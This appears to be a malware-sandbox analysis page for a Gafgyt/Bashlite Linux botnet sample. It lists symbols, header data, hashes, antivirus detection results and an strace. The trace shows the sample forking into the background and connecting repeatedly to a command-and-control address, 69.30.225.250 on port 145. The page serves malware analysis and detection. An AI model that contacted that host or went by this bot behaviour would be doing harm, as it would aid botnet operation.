sched_yield, , pthread_join, , __GI__rpc_dtablesize, , pthread_getconcurrency, , __GI_atoi, , fseeko64, , pthread_cond_timedwait, , __GI_sprintf, , clntudp_bufcreate, , __ctype_tolower, , __GI_svc_getreqset, , __GI_pthread_attr_getinheritsched, , sigwait, , wcrtomb, , __GI___rpc_thread_svc_max_pollfd, , pwrite, , close, , __libc_connect, , passwords, , pthread_attr_getschedparam, , srand48_r, , __GI_strlen, , sendHOLD, , mainCommSock, , pids, , vfprintf, , strpbrk, , pthread_setspecific, , xdr_int, , xdr_hyper, , getBogos, , sigsuspend, , _load_inttype, , raise, , clnt_sperrno, , free, , xdr_u_short, , sigprocmask, , __fputc_unlocked, , __GI_authnone_create, , __GI_xdr_short,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048168
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
117932
AVclass
gafgyt
1
VirusTotal
md5
9424e71e89434982f44698d94d527418
sha1
858d95250bf1252af5045cebd35f0e9a0e947078
SCANS (DETECTION RATE = 69.49%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20191007
version: 18.4.3895.0
detected: True check_circle

CMC
update: 20190321
version: 1.1.0.977
detected: False cancel

MAX
result: malware (ai score=97)
update: 20191008
version: 2019.9.16.1
detected: True check_circle

Bkav
update: 20191007
version: 1.3.0.10239
detected: False cancel

K7GW
result: Trojan ( 0001140e1 )
update: 20191007
version: 11.70.32201
detected: True check_circle

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 1.1.1.5
detected: True check_circle

Avast
result: ELF:DDoS-Y [Trj]
update: 20191007
version: 18.4.3895.0
detected: True check_circle

Avira
result: LINUX/Gafgyt.snnut
update: 20191007
version: 8.3.3.8
detected: True check_circle

Baidu
update: 20190318
version: 1.0.0.2
detected: False cancel

Cyren
update: 20191007
version: 6.2.2.2
detected: False cancel

DrWeb
result: Linux.BackDoor.Fgt.44
update: 20191008
version: 7.0.41.7240
detected: True check_circle

GData
result: Linux.Trojan.Gafgyt.B
update: 20191008
version: A:25.23634B:26.16210
detected: True check_circle

Panda
update: 20191007
version: 4.6.4.2
detected: False cancel

VBA32
update: 20191007
version: 4.1.0
detected: False cancel

VIPRE
version: None
detected: False cancel

Zoner
update: 20191007
version: 1.0.0.1
detected: False cancel

ClamAV
result: Unix.Trojan.Gafgyt-6981154-0
update: 20191007
version: 0.102.0.0
detected: True check_circle

Comodo
result: Malware@#3gsltlztezpf2
update: 20191007
version: 31575
detected: True check_circle

F-Prot
update: 20191008
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.Linux.Gafgyt
update: 20191007
version: 0.1.5.2
detected: True check_circle

McAfee
result: Linux/Gafgyt.g
update: 20191008
version: 6.0.6.653
detected: True check_circle

Rising
result: Backdoor.Gafgyt/Linux!1.A512 (CLASSIC)
update: 20191008
version: 25.0.0.24
detected: True check_circle

Sophos
result: Linux/DDoS-BI
update: 20191007
version: 4.98.0
detected: True check_circle

Yandex
update: 20191007
version: 5.5.2.24
detected: False cancel

Zillya
result: Backdoor.Gafgyt.Linux.4197
update: 20191007
version: 2.0.0.3919
detected: True check_circle

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 1.0.0.858
detected: True check_circle

FireEye
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 29.7.0.0
detected: True check_circle

TACHYON
update: 20191007
version: 2019-10-07.02
detected: False cancel

Tencent
result: Trojan.Linux.gafgyt.b
update: 20191008
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20191007
version: 2014.3.20.0
detected: False cancel

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 3.0.5.370
detected: True check_circle

AegisLab
result: Trojan.Linux.Gafgyt.4!c
update: 20191007
version: 4.2
detected: True check_circle

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20191008
version: 2018.12.0.1641
detected: True check_circle

F-Secure
result: Malware.LINUX/Gafgyt.snnut
update: 20191007
version: 12.0.86.52
detected: True check_circle

Fortinet
result: ELF/Gafgyt.BJ!tr
update: 20191008
version: 5.4.247.0
detected: True check_circle

Jiangmin
result: Backdoor.Linux.pv
update: 20191008
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20191008
version: 2013.8.14.323
detected: False cancel

Symantec
result: Trojan.Gen.NPE
update: 20191007
version: 1.10.0.0
detected: True check_circle

AhnLab-V3
result: Linux/Gafgyt.Gen17
update: 20191007
version: 3.16.3.25410
detected: True check_circle

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.d
update: 20190926
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.d
update: 20191007
version: 15.0.1.13
detected: True check_circle

MaxSecure
update: 20191007
version: 1.0.0.1
detected: False cancel

Microsoft
result: DDoS:Linux/Lightaidra
update: 20191007
version: 1.1.16400.2
detected: True check_circle

Qihoo-360
result: Win32/Trojan.a2a
update: 20191008
version: 1.0.0.1120
detected: True check_circle

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.d
update: 20191008
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.CF
update: 20191007
version: 20142
detected: True check_circle

TrendMicro
result: ELF_BASHLITE.DM
update: 20191007
version: 11.0.0.1006
detected: True check_circle

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 7.2
detected: True check_circle

K7AntiVirus
result: Trojan ( 0001140e1 )
update: 20191007
version: 11.70.32198
detected: True check_circle

SentinelOne
result: DFI - Malicious ELF
update: 20190807
version: 1.0.31.22
detected: True check_circle

Avast-Mobile
result: ELF:DDoS-S [Trj]
update: 20191007
version: 191007-00
detected: True check_circle

Malwarebytes
update: 20191007
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20191007
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
update: 20191007
version: 14.00
detected: False cancel

NANO-Antivirus
result: Trojan.Elf32.Gafgyt.efdmrq
update: 20191007
version: 1.0.134.24859
detected: True check_circle

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 14.0.297.0
detected: True check_circle

SUPERAntiSpyware
update: 20191004
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: Linux/Gafgyt.g
update: 20191007
version: v2017.3010
detected: True check_circle

TrendMicro-HouseCall
result: ELF_BASHLITE.DM
update: 20191008
version: 10.0.0.1040
detected: True check_circle

total
59
sha256
0153c04c2a6e96149211f206ca0b96d9b9a6c17224992f349b3d6f13bb7406e2
scan_id
0153c04c2a6e96149211f206ca0b96d9b9a6c17224992f349b3d6f13bb7406e2-1570490974
resource
9424e71e89434982f44698d94d527418
positives
41
scan_date
2019-10-07 23:29:34
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291execve"./malware"["./malware"][/* 15 vars */] 0
4291ioctl0TCGETS0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device -1 ENOTTY (Inappropriate ioctl for device)
4291ioctl1TCGETS0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device -1 ENOTTY (Inappropriate ioctl for device)
4291getpid 4291
4291ugetrlimitRLIMIT_STACK{rlim_cur=8192*1024, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}rlim_max=RLIM_INFINITY} 0
4291setrlimitRLIMIT_STACK{rlim_cur=2040*1024, {rlim_cur=2040*1024, rlim_max=RLIM_INFINITY}rlim_max=RLIM_INFINITY} 0
4291rt_sigactionSIGRTMIN{0x8050663, {0x8050663, [], []SA_RESTORER0x8051f9f}NULL8 0
4291rt_sigactionSIGRT_1{0x80505d2, {0x80505d2, [RTMIN], [RTMIN]SA_RESTORER0x8051f9f}NULL8 0
4291rt_sigactionSIGRT_2{0x804fdcb, {0x804fdcb, [], []SA_RESTORER0x8051f9f}NULL8 0
4291rt_sigprocmaskSIG_BLOCK[RTMIN]NULL8 0
4291rt_sigprocmaskSIG_UNBLOCK[RT_1]NULL8 0
4291brkNULL 0x85a4000
4291brk0x85a5000 0x85a5000
4291fork 4292
4291exit0 ?
4292setsid 4292
4292fork4292 fork(
4293open"/dev/null"O_RDWR 3
4293dup230 0
4293dup231 1
4293dup232 2
4293close3 0
4293timeNULL 1571351692
4293getpid 4293
4293timeNULL 1571351692
4293getpid 4293
4293fork4293 fork(
4294getpid 4294
4294fork4294 fork(
4295getpid 4295
4295setsid 4295
4295chdir"/" 0
4295rt_sigactionSIGPIPE{SIG_IGN, {SIG_IGN, [PIPE], [PIPE]SA_RESTORER|SA_RESTART0x8051f9f}{SIG_DFL, {SIG_DFL, [], []0}8 0
4295socketPF_INETSOCK_STREAMIPPROTO_IP 3
4295fcntl3F_GETFL) = 0x2 (flags O_RDWR 0x2 (flags O_RDWR)
4295fcntl3F_SETFLO_RDWR|O_NONBLOCK 0
4295connect3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(145), sin_port=htons(145), sin_addr=inet_addr("69.30.225.250")}sin_addr=inet_addr("69.30.225.250")}16) = -1 EINPROGRESS (Operation now in progress -1 EINPROGRESS (Operation now in progress)
4295_newselect4NULL[3]NULL4295 _newselect(4, NULL, [3], NULL, {30, 8}
429442954294 <... fork resumed> 4295
4294exit0 ?
429342944293 <... fork resumed> 4294
4293---4293 --- SIGCHLD {si_signo=SIGCHLDsi_code=CLD_EXITEDsi_pid=4294si_uid=1000si_status=0si_utime=0si_stime=0} --0} ---
4293wait44294[{WIFEXITED(s) && WEXITSTATUS(s) == 0}]0NULL 4294
4293exit0 ?
429242934292 <... fork resumed> 4293
4292---4292 --- SIGCHLD {si_signo=SIGCHLDsi_code=CLD_EXITEDsi_pid=4293si_uid=1000si_status=0si_utime=0si_stime=0} --0} ---
4292exit0 ?
4295Timeout 0 (Timeout)
4295rt_sigprocmaskSIG_BLOCK[CHLD][RTMIN]8 0
4295rt_sigactionSIGCHLDNULL{SIG_DFL, {SIG_DFL, [], []0}8 0
4295rt_sigprocmaskSIG_SETMASK[RTMIN]NULL8 0
4295nanosleep{5,{5, 1571351692}1571351692}0xfffbfa24 0
4295close3 0
4295socketPF_INETSOCK_STREAMIPPROTO_IP 3
4295fcntl3F_GETFL) = 0x2 (flags O_RDWR 0x2 (flags O_RDWR)
4295fcntl3F_SETFLO_RDWR|O_NONBLOCK 0
4295connect3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(145), sin_port=htons(145), sin_addr=inet_addr("69.30.225.250")}sin_addr=inet_addr("69.30.225.250")}16) = -1 EINPROGRESS (Operation now in progress -1 EINPROGRESS (Operation now in progress)
4295_newselect4NULL[3]NULL4295 _newselect(4, NULL, [3], NULL, {30, 8}

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Success

Strace
Success

Results
True check_circle

DNS
Query

Response

TCP
Info
computer localhost:57426 arrow_forward 69.30.225.250:145
computer localhost:57424 arrow_forward 69.30.225.250:145

UDP
Info
computer localhost:5353 arrow_forward help_outline 224.0.0.251:5353

HTTP
Info

Summary
DNS
False cancel

TCP
True check_circle

UDP
True check_circle

HTTP
False cancel

Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 99.98%
suspicious: True check_circle
SVM
confidence: 98.80%
suspicious: True check_circle
Add to Collection
Download